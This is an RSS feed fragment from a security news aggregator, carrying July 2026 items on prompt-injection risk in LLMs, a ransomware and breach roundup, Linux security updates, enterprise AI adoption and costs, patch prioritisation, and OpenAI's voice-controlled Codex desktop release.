<content:encoded><![CDATA[<p>Author: Security Weekly - A CRA Resource - Bewertung: 2x - Views:12 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/zKXmtFm-Gyw?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>Modern LLMs process prompts by predicting the next token from context. They don't inherently distinguish system instructions from user instructions, and many "reasoning" models use the same underlying architecture while producing reasoning-style text.<br />
<br />
That makes prompt or command injection a persistent security challenge and highlights an important limitation: fluent explanations aren't necessarily evidence of genuine reasoning or understanding. Developers need additional safeguards instead of assuming the model can reliably separate trustworthy instructions from malicious ones.<br />
<br />
Should future AI models include stronger architectural separation between trusted instructions and user input, or can software safeguards solve the problem?<br />
<br />
Subscribe to our podcasts: https://securityweekly.com/subscribe<br />
<br />
#LLM #SecurityWeekly #Cybersecurity #InformationSecurity #AI #InfoSec<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[What I track in a day]]></title>
<description><![CDATA[This is Optimizer, a weekly newsletter sent from Verge senior reviewer Victoria Song that dissects and discusses the latest gizmos and potions that swear they're going to change your life. Optimizer will be taking a two-week break and will be moving to Wednesdays starting August 12th. Opt in for ...]]></description>
<link>https://tsecurity.de/de/3691780/it-nachrichten/what-i-track-in-a-day/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691780/it-nachrichten/what-i-track-in-a-day/</guid>
<pubDate>Fri, 24 Jul 2026 16:21:28 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[This is Optimizer, a weekly newsletter sent from Verge senior reviewer Victoria Song that dissects and discusses the latest gizmos and potions that swear they're going to change your life. Optimizer will be taking a two-week break and will be moving to Wednesdays starting August 12th. Opt in for Optimizer here. My For You page […]]]></content:encoded>
</item>
<item>
<title><![CDATA[The Cyber Express Weekly Roundup: Ransomware Surge, Data Breaches, and Rising Digital Threats]]></title>
<description><![CDATA[This week’s cybersecurity landscape highlights the continued expansion of cyber risks across governments, businesses, and consumers. From ransomware campaigns targeting organizations worldwide to credential-based attacks, data breaches, online fraud, and digital piracy crackdowns, recent incident...]]></description>
<link>https://tsecurity.de/de/3691669/it-security-nachrichten/the-cyber-express-weekly-roundup-ransomware-surge-data-breaches-and-rising-digital-threats/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691669/it-security-nachrichten/the-cyber-express-weekly-roundup-ransomware-surge-data-breaches-and-rising-digital-threats/</guid>
<pubDate>Fri, 24 Jul 2026 15:30:41 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="831" height="491" src="https://thecyberexpress.com/wp-content/uploads/The-Cyber-Express-weekly-roundup-July-2026-2.webp" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="The Cyber Express weekly roundup July 2026" decoding="async" srcset="https://thecyberexpress.com/wp-content/uploads/The-Cyber-Express-weekly-roundup-July-2026-2.webp 831w, https://thecyberexpress.com/wp-content/uploads/The-Cyber-Express-weekly-roundup-July-2026-2-300x177.webp 300w, https://thecyberexpress.com/wp-content/uploads/The-Cyber-Express-weekly-roundup-July-2026-2-768x454.webp 768w, https://thecyberexpress.com/wp-content/uploads/The-Cyber-Express-weekly-roundup-July-2026-2-600x355.webp 600w, https://thecyberexpress.com/wp-content/uploads/The-Cyber-Express-weekly-roundup-July-2026-2-150x89.webp 150w, https://thecyberexpress.com/wp-content/uploads/The-Cyber-Express-weekly-roundup-July-2026-2-750x443.webp 750w, https://thecyberexpress.com/wp-content/uploads/The-Cyber-Express-weekly-roundup-July-2026-2.webp 831w, https://thecyberexpress.com/wp-content/uploads/The-Cyber-Express-weekly-roundup-July-2026-2-300x177.webp 300w, https://thecyberexpress.com/wp-content/uploads/The-Cyber-Express-weekly-roundup-July-2026-2-768x454.webp 768w, https://thecyberexpress.com/wp-content/uploads/The-Cyber-Express-weekly-roundup-July-2026-2-600x355.webp 600w, https://thecyberexpress.com/wp-content/uploads/The-Cyber-Express-weekly-roundup-July-2026-2-150x89.webp 150w, https://thecyberexpress.com/wp-content/uploads/The-Cyber-Express-weekly-roundup-July-2026-2-750x443.webp 750w" sizes="(max-width: 831px) 100vw, 831px" title="The Cyber Express Weekly Roundup: Ransomware Surge, Data Breaches, and Rising Digital Threats 1"></p><span data-contrast="auto">This week’s cybersecurity landscape highlights the continued expansion of cyber risks across governments, businesses, and consumers. From ransomware campaigns targeting organizations worldwide to credential-based attacks, data breaches, online fraud, and digital piracy crackdowns, recent incidents show how threat actors are exploiting both technical vulnerabilities and human behavior.</span><span data-ccp-props="{}"> </span>

<span data-contrast="auto">The latest developments underline the need for stronger security practices, including improved identity protection, faster <a class="wpil_keyword_link" href="https://cyble.com/knowledge-hub/what-is-incident-response/" target="_blank" rel="noopener" title="incident response" data-wpil-keyword-link="linked" data-wpil-monitor-id="29121">incident response</a>, and greater awareness of evolving cyber threats. Organizations are increasingly dealing with attacks that go beyond <a class="wpil_keyword_link" href="https://thecyberexpress.com/what-is-data/" title="data" data-wpil-keyword-link="linked" data-wpil-monitor-id="29120">data</a> theft, affecting operations, customer trust, and critical services.</span><span data-ccp-props="{}"> </span>
<h2 aria-level="2"><b><span data-contrast="none">The Cyber Express Weekly Roundup</span></b><span data-ccp-props='{"134245418":true,"134245529":true,"335559738":160,"335559739":80}'> </span></h2>
<h3 aria-level="3"><b><span data-contrast="none">U.S. Accounts for Nearly Half of Global Ransomware Attacks in H1 2026</span></b><span data-ccp-props='{"134245418":true,"134245529":true,"335559738":160,"335559739":80}'> </span></h3>
<span data-contrast="auto">The United States experienced 1,721 ransomware attacks during the first half of 2026, representing nearly 45% of all incidents tracked globally, according to research from <a href="https://cyble.com/resources/research-reports/global-threat-landscape-h1-2026/" target="_blank" rel="nofollow noopener">Cyble Research and Intelligence Labs (CRIL)</a>. The report identified <a class="wpil_keyword_link" href="https://cyble.com/knowledge-hub/what-is-ransomware/" target="_blank" rel="noopener" title="ransomware" data-wpil-keyword-link="linked" data-wpil-monitor-id="29122">ransomware</a> groups Qilin and Akira as among the most active threat actors during the period. </span><a href="https://thecyberexpress.com/us-ransomware-attacks-in-h1-2026/" target="_blank" rel="noopener"><b><span data-contrast="none">Read more...</span></b></a><span data-ccp-props="{}"> </span>
<h3 aria-level="3"><b><span data-contrast="none">Dubai Police Warns Against Online Visa Fraud Schemes</span></b><span data-ccp-props='{"134245418":true,"134245529":true,"335559738":160,"335559739":80}'> </span></h3>
<span data-contrast="auto">Dubai Police has issued a warning about fraudulent online advertisements offering work, residency, and visit visas in exchange for payment. Scammers have reportedly used social media platforms and messaging applications to impersonate government entities or unauthorized service providers to trick victims. </span><a href="https://thecyberexpress.com/dubai-police-fraudulent-visa-ads/" target="_blank" rel="noopener"><b><span data-contrast="none">Read more...</span></b></a><span data-ccp-props="{}"> </span>
<h3 aria-level="3"><b><span data-contrast="none">Craneware Data Breach Exposes Employee and Customer Information</span></b><span data-ccp-props='{"134245418":true,"134245529":true,"335559738":160,"335559739":80}'> </span></h3>
<span data-contrast="auto">Healthcare technology company Craneware confirmed that unauthorized individuals accessed part of its data environment, resulting in the exposure of employee information as well as some customer and partner records. The company stated that the incident has been contained and has not disrupted business operations or customer services. </span><a href="https://thecyberexpress.com/craneware-data-breach/" target="_blank" rel="noopener"><b><span data-contrast="none">Read more...</span></b><span data-contrast="none"> </span></a><span data-ccp-props="{}"> </span>
<h3 aria-level="3"><b><span data-contrast="none">U.S. Targets Illegal FIFA World Cup Streaming Networks</span></b><span data-ccp-props='{"134245418":true,"134245529":true,"335559738":160,"335559739":80}'> </span></h3>
<span data-contrast="auto">The U.S. Department of Justice seized more than 1,000 domains allegedly involved in illegally streaming FIFA World Cup 2026 matches. The action was carried out under Operation Offsides, an initiative focused on combating online piracy and protecting intellectual property rights. </span><a href="https://thecyberexpress.com/illegal-world-cup-streaming-domains-seized/" target="_blank" rel="noopener"><b><span data-contrast="none">Read more...</span></b></a><span data-ccp-props="{}"> </span>
<h3 aria-level="3"><b><span data-contrast="none">Chick-fil-A Customer Accounts Targeted in Credential Attack</span></b><span data-ccp-props='{"134245418":true,"134245529":true,"335559738":160,"335559739":80}'> </span></h3>
<span data-contrast="auto">Chick-fil-A confirmed that certain customer accounts were accessed during an automated credential-stuffing attack between June 17 and June 19, 2026. The attackers used account credentials obtained from an external source to gain unauthorized access. The company said affected information may have included customer names, email addresses, membership details, and limited payment-related data. </span><a href="https://thecyberexpress.com/chick-fil-a-data-security-incident/" target="_blank" rel="noopener"><b><span data-contrast="none">Read more...</span></b></a><span data-ccp-props="{}"> </span>
<h3 aria-level="3"><b><span data-contrast="none">South Korea Diplomatic System Breach Lasted Nearly 10 Months</span></b><span data-ccp-props='{"134245418":true,"134245529":true,"335559738":160,"335559739":80}'> </span></h3>
<span data-contrast="auto">South Korea’s Ministry of Foreign Affairs revealed that attackers maintained access to the National Diplomatic Academy’s online education system for almost 10 months. The breach, which began in April 2025, exposed information linked to thousands of current and former ministry employees. Compromised data included user IDs, names, email addresses, and encrypted passwords. </span><a href="https://thecyberexpress.com/national-diplomatic-academy-data-breach-korea/" target="_blank" rel="noopener"><b><span data-contrast="none">Read more..</span></b></a><b><span data-contrast="auto">.</span></b><span data-ccp-props='{"134233117":false,"134233118":false,"201341983":0,"335551550":1,"335551620":1,"335559685":0,"335559737":0,"335559738":0,"335559739":160,"335559740":279}'> </span>
<h2 aria-level="2"><b><span data-contrast="none">Weekly Cybersecurity Takeaway</span></b><span data-ccp-props='{"134245418":true,"134245529":true,"335559738":160,"335559739":80}'> </span></h2>
<span data-contrast="auto">The week’s incidents demonstrate how <a class="wpil_keyword_link" href="https://thecyberexpress.com/cyber-news/" title="cyber" data-wpil-keyword-link="linked" data-wpil-monitor-id="29124">cyber</a> threats continue to evolve across multiple areas, from ransomware and account compromise to online scams and government-related breaches. Attackers are increasingly targeting weaknesses in identity management, user behavior, and digital infrastructure.</span><span data-ccp-props="{}"> </span>

<span data-contrast="auto">Organizations and individuals must focus on proactive security measures, including stronger authentication controls, regular monitoring, timely updates, and greater awareness of <a class="wpil_keyword_link" href="https://cyble.com/knowledge-hub/what-is-social-engineering/" target="_blank" rel="noopener" title="social engineering" data-wpil-keyword-link="linked" data-wpil-monitor-id="29123">social engineering</a> tactics. As cyber threats become more widespread and interconnected, improving resilience remains essential for protecting data, services, and public trust.</span><span data-ccp-props="{}"> </span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Friday]]></title>
<description><![CDATA[Security updates have been issued by AlmaLinux (glibc, java-21-openjdk, kernel, and libpq), Debian (imagemagick, spice-vdagent, and webkit2gtk), Fedora (cryptlib, dotnet8.0, dotnet9.0, firefox, python-black, python-lsp-black, and python-pytokens), Mageia (apache, cifs-utils, dnsmasq, lrzip, and s...]]></description>
<link>https://tsecurity.de/de/3691648/linux-tipps/security-updates-for-friday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691648/linux-tipps/security-updates-for-friday/</guid>
<pubDate>Fri, 24 Jul 2026 15:13:19 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>AlmaLinux</b> (glibc, java-21-openjdk, kernel, and libpq), <b>Debian</b> (imagemagick, spice-vdagent, and webkit2gtk), <b>Fedora</b> (cryptlib, dotnet8.0, dotnet9.0, firefox, python-black, python-lsp-black, and python-pytokens), <b>Mageia</b> (apache, cifs-utils, dnsmasq, lrzip, and socat), <b>Oracle</b> (.NET 10.0, .NET 9.0, 389-ds-base, cups, edk2, fence-agents, firefox, freeipmi, freerdp, git-lfs, glib2, gnutls, golang, gstreamer1-plugins-bad-free, gstreamer1-plugins-good, gstreamer1-plugins-ugly-free, hplip, libinput, libvirt, libxml2, memcached, nginx, openexr, perl-DBI, perl-XML-LibXML, php, php8.4, plexus-utils, postgresql16, python3.12, python3.14, sssd, tomcat, tomcat9, unbound, vim, xorg-x11-server-Xwayland, yggdrasil, and yggdrasil-worker-package-manager), <b>Red Hat</b> (container-tools:rhel8, git-lfs, go-toolset:rhel8, golang, golang-github-openprinting-ipp-usb, grafana, grafana-pcp, host-metering, java-1.8.0-openjdk, java-11-openjdk with Extended Lifecycle Support, java-17-openjdk, java-21-openjdk, oci-seccomp-bpf-hook, rhc, rhc-worker-playbook, skopeo, xorg-x11-server, xorg-x11-server-Xwayland, and yggdrasil), <b>Slackware</b> (mozilla-thunderbird), <b>SUSE</b> (afterburn, alloy, apache-sshd, apache2, avahi, chromium, clamav, curl, dhcpcd, dnsmasq, docker-compose, ffmpeg-7, firefox-esr, gawk, glibc, gnutls, go1.26-openssl, google-osconfig-agent, gpg2, haproxy, ImageMagick, imagemagick, jline3, jq, kernel, libgcrypt, libgnt, meson, pidgin, nmap, nodejs24, pacemaker, patch, perl-HTML-Parser, perl-libwww-perl, perl-List-SomeUtils-XS, python-aiohttp, python-WebOb, qemu, rust-keylime, SVT-AV1, libyuv0, libaom3, trivy, ucode-intel, and wireshark), and <b>Ubuntu</b> (libhttp-date-perl, libxpm, linux-azure, linux-azure-fde, pam, and rsyslog).]]></content:encoded>
</item>
<item>
<title><![CDATA[Wie mit KI aus Daten Entscheidungen werden | Computer Weekly]]></title>
<description><![CDATA[Sicherheit, Zugriffsrichtlinien und Überprüfbarkeit müssen parallel zur Demokratisierung selbst skalieren. Wenn dies geschieht, ist das Ergebnis nicht ...]]></description>
<link>https://tsecurity.de/de/3691598/it-security-nachrichten/wie-mit-ki-aus-daten-entscheidungen-werden-computer-weekly/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691598/it-security-nachrichten/wie-mit-ki-aus-daten-entscheidungen-werden-computer-weekly/</guid>
<pubDate>Fri, 24 Jul 2026 14:59:20 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<b>Sicherheit</b>, Zugriffsrichtlinien und Überprüfbarkeit müssen parallel zur Demokratisierung selbst skalieren. Wenn dies geschieht, ist das Ergebnis nicht ...]]></content:encoded>
</item>
<item>
<title><![CDATA[Why I changed how I pitch AI: It’s no longer about saving money, but managing tokens and adoption]]></title>
<description><![CDATA[I have worked alongside enterprise technology for more than 30 years and watched AI evolve from a lab experiment into the modern boardroom’s core focus. However, the last few years of implementing AI alongside our customers have delivered our most profound reality checks.



The initial hype has ...]]></description>
<link>https://tsecurity.de/de/3691324/it-nachrichten/why-i-changed-how-i-pitch-ai-its-no-longer-about-saving-money-but-managing-tokens-and-adoption/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691324/it-nachrichten/why-i-changed-how-i-pitch-ai-its-no-longer-about-saving-money-but-managing-tokens-and-adoption/</guid>
<pubDate>Fri, 24 Jul 2026 13:04:13 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">I have worked alongside enterprise technology for more than 30 years and watched AI evolve from a lab experiment into the modern boardroom’s core focus. However, the last few years of implementing AI alongside our customers have delivered our most profound reality checks.</p>



<p class="wp-block-paragraph">The initial hype has faded, leaving CIOs to drive real enterprise value. Based on my experience implementing Google, OpenAI and Anthropic technologies, here are the fundamental, technology-agnostic lessons every leader must anchor their strategy around.</p>



<h2 class="wp-block-heading"><a></a>AI as a leadership multiplier</h2>



<p class="wp-block-paragraph">The most common tactical error we see is treating AI as an isolated technology project. What I have observed among our customers is that true success does not come from organizations that define a standalone “AI strategy,” but rather from those leaders that integrate AI into their business strategy.</p>



<p class="wp-block-paragraph">When our customers isolate AI and define an AI strategy, it inevitably treats it like a “technological toy” to experiment with. This approach yields fragmented, orphaned initiatives that fail to scale because they are fundamentally disconnected from their core corporate objectives. What I learned is that AI is not the ultimate destination; it is a powerful catalyst. We have replaced “What can AI do for our customers?” with a more strategic question, “How does AI accelerate their existing business goals?”</p>



<p class="wp-block-paragraph">Think of AI like electricity. No modern corporation designs a standalone “electricity strategy.” Instead, all companies route it invisibly across the entire organization to illuminate offices, power production lines and drive communication. AI must be woven into the enterprise fabric in the exact same way, acting as an underlying utility that supercharges your existing operational model.</p>



<p class="wp-block-paragraph">Integrating AI into the broader business strategy also dictates how we measure success. It forces a shift away from short-term tech vanity metrics and anchors the technology into a long-term roadmap.</p>



<p class="wp-block-paragraph">When AI remains trapped within the IT department of our customers, we notice that it is relegated to a mere “software experiment.” To become a true competitive advantage, we observed that AI requires intense cross-functional orchestration. This perspective does not diminish the merit of the technical team; their expertise is fundamental for establishing the architecture, data governance and tools your enterprise requires. However, while IT builds the foundational infrastructure, it lacks the organizational authority to decide what should be built on top of it. Only the CEO or the owner of the company can step in to ensure AI leaves the “toy project” phase and integrates into the DNA of the organization.</p>



<p class="wp-block-paragraph">The requirement for top-down, executive ownership stems from three critical realities observed in the field:</p>



<ul class="wp-block-list">
<li><strong>Silo-smashing and data collaboration:</strong> True enterprise AI is data-hungry and that data lives across disparate business lines, finance, operations, marketing and customer service. Only the CEO possesses the cross-functional authority to demand that data silos be dismantled.</li>



<li><strong>Cultural transformation and fear mitigation:</strong> AI triggers widespread anxiety over job displacement across all industries and hierarchies. When relegated to an “IT project,” resistance spikes as teams view it as a threat to their livelihoods. When I saw the CEO lead this cultural shift directly is when I noticed the best results.</li>



<li><strong>C-Suite education and strategic alignment:</strong> The mandate for AI capability cannot just be delegated downward; the transformation must begin at the very top. I have conducted more than 70 presentations for the Board of Directors and C-Level teams. These people need to be actively educated not on technical code, but on specific business use cases, return on investment (ROI) frameworks and how AI resolves core organizational bottlenecks.</li>
</ul>



<p class="wp-block-paragraph"><a href="https://www.pwc.com/gx/en/issues/c-suite-insights/ceo-survey.html">PwC’s data found that only 12% of enterprises have achieved both cost and revenue benefits from AI</a>. Those elite 12% succeeded precisely because their CEOs embedded AI extensively across <em>strategic decision-making and cross-functional workflows</em>. AI is simply too disruptive and too critical to be left exclusively in the hands of technical experts. If AI is not on the CEO’s weekly agenda, it is fundamentally missing from the company’s true strategy.</p>



<h2 class="wp-block-heading"><a></a>AI as a new operational framework</h2>



<p class="wp-block-paragraph">Traditional IT systems have operated on strict algorithmic certainty: if you input a specific set of data, the system executes an immutable line of code and guarantees the same, predictable output every single time.</p>



<p class="wp-block-paragraph">AI completely breaks this paradigm. Because modern AI is built on probabilistic models, it does not execute static formulas; instead, it predicts the most likely correct response based on mathematical probabilities. This means that AI solutions carry an inherent, small percentage of uncertainty and variability. A prompt entered today might yield a slightly different, though contextually valid, output tomorrow.</p>



<p class="wp-block-paragraph">Executive leadership and organizational cultures must be actively educated to accept and navigate this fundamental shift. Traditional quality assurance frameworks for software are designed for a 100% success rate. Applying this rigid standard to AI will paralyze your initiatives, keeping 80% of your projects trapped eternally in the pilot phase. This happened to us in a food and beverage company in Latin America a couple of years ago. After this experience, we started to include conditions in our contracts that tolerate statistical margins of error and still define the project as a success.</p>



<p class="wp-block-paragraph">In terms of cost calculation, we had to teach CIOs and business managers to forget the monthly subscription model for AI and learn to manage the primary unit of exchange in modern AI: the token.</p>



<p class="wp-block-paragraph">To understand AI costs, executives must understand how large language models process data. AI models do not read full words; instead, they break text, images or code down into “pieces” called tokens. As a baseline, every 100 words process as approximately 130 to 140 tokens. Because the major AI providers use the token as their currency, <a href="https://arxiv.org/pdf/2604.22750">your business is billed dynamically based on the exact volume of tokens consumed</a> by every query submitted (input) and every response generated (output).</p>



<p class="wp-block-paragraph">Many leaders believe AI costs are fixed due to flat-rate enterprise tiers ($25–$30/user). This is a temporary illusion. These venture-capital-subsidized rates mask true operational costs and come with dynamic usage limits. Modeling long-term ROI on them guarantees a severe budget shock when true consumption pricing takes over.</p>



<p class="wp-block-paragraph">The solution is not to halt AI adoption; doing so means losing your competitive edge. Instead, the cost per token must cease to be treated as a technical footnote relegated to the IT department. It must be elevated to a core business variable.</p>



<h2 class="wp-block-heading">Risks in the AI adoption model</h2>



<p class="wp-block-paragraph">Since the beginning of the AI boom, I have seen all our customers making a critical tactical error that could cost them heavily in the medium term: they are focusing only on operational efficiency (reducing costs with AI).</p>



<p class="wp-block-paragraph">I have observed that an alarmingly high percentage of companies remain trapped in pilot phases focused exclusively on short-term cost reduction. <a href="https://www.bain.com/insights/your-ai-budget-is-growing-your-returns-arent-heres-why/">Bain &amp; Company’s global Automation and AI Pathfinder Survey </a>found that the largest share of companies measuring their AI initiatives (exactly 40%) realized cost reductions of 10% or less, heavily missing their internal targets. Our customers are putting too many resources and effort into marginal financial gains and in doing so, they are jeopardizing their most valuable assets: service quality, resilience and customer trust.</p>



<p class="wp-block-paragraph">Utilizing AI solely to slash headcount or cut operational corners is a dangerous trap that introduces severe field liabilities. A financial service organization in Latin America announced that they saved $1 million in customer support by replacing humans with AI chatbots. However, the mid-term reality revealed a different story: a damaged brand reputation due to AI errors and an influx of frustrated clients fleeing because the automated system cannot handle special cases.</p>



<p class="wp-block-paragraph">Putting a company on an extreme AI diet might make it look leaner on next quarter’s financial statement, but over-indexing on cost-cutting will ultimately leave the business too weak to compete when market dynamics shift. We are now inviting our customers to change the question from <em>“How much money will AI save us?”</em> to <em>“How will we leverage AI to exponentially increase the long-term value of our enterprise?”</em></p>



<p class="wp-block-paragraph">Deploying enterprise AI is a marathon, not a sprint, and the terrain changes with every mile. The organizations that thrive in this next era will be those that transition from fascination to discipline, treating AI not as a magic bullet for immediate savings, but as a core capability that demands rigorous governance, architectural foresight and cultural maturity. Navigating this shift requires moving past the theoretical hype and anchoring decisions in raw, field-tested reality.</p>



<p class="wp-block-paragraph">As we continue to deploy these technologies across industries, the blueprint for success is being rewritten in real time. Let’s keep this conversation going as we map out the future of business intelligence together.</p>



<p class="wp-block-paragraph"><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.cio.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[The Hidden Risk of Patch Priorities]]></title>
<description><![CDATA[Author: Security Weekly - A CRA Resource - Bewertung: 0x - Views:1 Patch management isn't just about fixing the highest number of vulnerabilities. Upgrade complexity, deployment time, and the actual severity of the vulnerabilities all influence what should be patched first.

A massive upgrade may...]]></description>
<link>https://tsecurity.de/de/3690351/it-security-video/the-hidden-risk-of-patch-priorities/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3690351/it-security-video/the-hidden-risk-of-patch-priorities/</guid>
<pubDate>Fri, 24 Jul 2026 00:21:27 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Security Weekly - A CRA Resource - Bewertung: 0x - Views:1 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/ggCkiQAHW4A?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>Patch management isn't just about fixing the highest number of vulnerabilities. Upgrade complexity, deployment time, and the actual severity of the vulnerabilities all influence what should be patched first.<br />
<br />
A massive upgrade may eliminate thousands of CVEs but consume weeks or months of effort while providing relatively little reduction in real-world risk. Organizations need context—not just vulnerability counts—to prioritize effectively and make the best use of limited resources.<br />
<br />
When security teams have limited time and staff, should they prioritize the biggest vulnerability count, or the patch that delivers the greatest reduction in actual risk?<br />
<br />
Subscribe to our podcasts: https://securityweekly.com/subscribe<br />
<br />
#PatchManagement #VulnerabilityManagement #SecurityWeekly #Cybersecurity #InformationSecurity #AI #InfoSec<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Agentic coding goes hands free as OpenAI brings GPT-Live's full duplex voice control to Codex and ChatGPT on the desktop]]></title>
<description><![CDATA[Two weeks after debuting its more naturalistic GPT-Live audio AI model with full-duplex capabilities (listening and speaking at the same time), OpenAI is bringing it directly into developer workflows. The company announced that GPT-Live now powers the ChatGPT desktop application on macOS and Wind...]]></description>
<link>https://tsecurity.de/de/3690348/it-nachrichten/agentic-coding-goes-hands-free-as-openai-brings-gpt-lives-full-duplex-voice-control-to-codex-and-chatgpt-on-the-desktop/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3690348/it-nachrichten/agentic-coding-goes-hands-free-as-openai-brings-gpt-lives-full-duplex-voice-control-to-codex-and-chatgpt-on-the-desktop/</guid>
<pubDate>Fri, 24 Jul 2026 00:20:42 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Two weeks after debuting its <a href="https://venturebeat.com/technology/openai-launches-gpt-live-a-full-duplex-voice-upgrade-that-lets-chatgpt-talk-more-like-a-person">more naturalistic GPT-Live audio AI model</a> with full-duplex capabilities (listening and speaking at the same time), OpenAI is bringing it directly into developer workflows. </p><p>The company announced that <a href="https://x.com/OpenAI/status/2080378182469857576">GPT-Live now powers the ChatGPT desktop application</a> on macOS and Windows, integrating directly with agentic systems like Codex and ChatGPT Work (which are separate experiences available in the ChatGPT desktop app). </p><p>When OpenAI initially launched GPT-Live on July 8, 2026, it introduced a continuous audio model capable of listening and speaking simultaneously—eliminating rigid turn-taking while delegating complex reasoning to background models like GPT-5.5. </p><p>Today's release expands that conversational layer to technical tasks, enabling software engineers to orchestrate multi-threaded coding jobs, review pull requests, and debug applications using natural voice commands.</p><p>As such, it could usher in a new era of "hands free" software development and even live, in-person group coding parties for <a href="https://openai.com/index/codex-for-knowledge-work/">Codex's more than 5 million weekly active users</a>. Codex, of course, is the name given to OpenAI's models and harness focused on coding, but which the company has this year expanded into a more <a href="https://venturebeat.com/technology/openai-drastically-updates-codex-desktop-app-to-use-all-other-apps-on-your-computer-generate-images-preview-webpages">general productivity platform. </a>An OpenAI spokesperson told VentureBeat this is the first time voice activation has been included natively with Codex on the desktop. </p><p>OpenAI posted a <a href="https://youtu.be/E0ZMOschrTU?si=WWc8fZ2o0UtxrDFk">promotional video</a> showing some of its employees, Codex developer experience engineer Jason Liu and Codex technical staffer Guinness Chen, speaking to the same ChatGPT desktop app session in the same room, each issuing different instructions and conversing with the same model. </p><div></div><h2><b>New capabilities unlocked</b></h2><p>At its core, this integration relies on decoupling the real-time voice layer from the underlying execution engines.</p><p>While GPT-Live maintains fluid conversation—inserting natural verbal acknowledgments like "got it" without interrupting the user—it passes heavy computational workloads to background reasoning models. </p><p>On macOS, the desktop application incorporates "Appshots" and screen context features, allowing ChatGPT Voice to analyze the frontmost window alongside local files, codebase structures, and active plugins.</p><p>This architecture creates a pair-programming dynamic where developers talk through problems conversationally while agents execute tasks asynchronously. </p><p>Rather than manually stopping coding sessions to type detailed instructions or switch windows, developers direct the system hands-free. </p><p>The full-duplex engine dynamically decides when to speak, pause, or invoke tools, maintaining conversational state even as background agents process complex code modifications.</p><h2><b>Directing coding and complex builds with your voice alone</b></h2><p>The central operational capability in this update centers on multi-task execution across Codex and ChatGPT Work environments. </p><p>Software engineers can initiate multiple concurrent task threads from a single spoken prompt. For instance, a developer preparing to ship a feature can instruct the system to investigate an open authentication bug, review a pending API migration pull request, and generate missing unit tests simultaneously.</p><p>The desktop application coordinates these actions across disparate contexts, tracing issues through Slack conversations, GitHub repositories, and local codebases.</p><p>Developers can also verbally convert design mockups into working code, splitting tasks across frontend, backend, and testing layers. </p><p>With support for multi-folder projects (build 26.715) and remote execution via iOS, engineers can check task progress, answer agent prompts, and redirect active jobs without switching applications or managing individual processes line by line.</p><h2><b>Proprietary license</b></h2><p>OpenAI’s voice-enabled desktop release operates under a proprietary, commercial enterprise model. Access is restricted to paid subscribers across Plus, Pro, Business, Enterprise, and Education plans.</p><p>For individual developers and corporate engineering departments, this commercial structure means the model weights, voice processing pipelines, and agent state architectures remain fully closed. </p><p>Organizations cannot modify or self-host the underlying systems. Furthermore, tasks initiated via ChatGPT Voice consume standard usage allocations directly from existing Codex and ChatGPT Work plan quotas, treating voice-triggered actions identically to standard agentic workloads.</p><h2><b>Community reactions</b></h2><p>Developer communities immediately noted the implications of bringing continuous full-duplex voice to autonomous coding workflows. </p><p>Reacting to the build 26.715 release announcement—which details voice integration and multi-folder project support—AI Insider journalist <a href="https://x.com/ChrisGPT/status/2080375250139693293">@ChrisGPT noted on X</a>: "Today OpenAI will release voice and remote guidance for codex ! One step closer to personal AGI". </p><p>Early technical feedback highlights widespread enthusiasm for orchestrating complex agentic tasks hands-free, particularly when stepping away from the workstation or managing build pipelines remotely.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Fixing Vulns Is Harder Than Finding Them - PSW #936]]></title>
<description><![CDATA[Author: Security Weekly - A CRA Resource - Bewertung: 0x - Views:5 In the news this week:

- InfraTrust and knowing what to patch
- Adversary in the middle triggered command injection
- Exploitarium again
- FreeRDP comes with free vulnerabilities
- AI breaking out of sandboxes on its own
-...]]></description>
<link>https://tsecurity.de/de/3690255/it-security-video/fixing-vulns-is-harder-than-finding-them-psw-936/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3690255/it-security-video/fixing-vulns-is-harder-than-finding-them-psw-936/</guid>
<pubDate>Thu, 23 Jul 2026 23:17:52 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
